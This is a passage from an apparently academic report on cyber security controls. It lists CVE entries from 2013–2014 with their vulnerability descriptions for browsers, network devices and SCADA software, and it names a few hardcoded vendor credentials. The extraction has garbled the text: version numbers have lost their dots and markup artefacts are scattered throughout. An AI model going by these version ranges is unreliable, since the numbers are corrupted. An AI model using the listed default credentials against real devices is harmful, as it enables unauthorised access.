CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
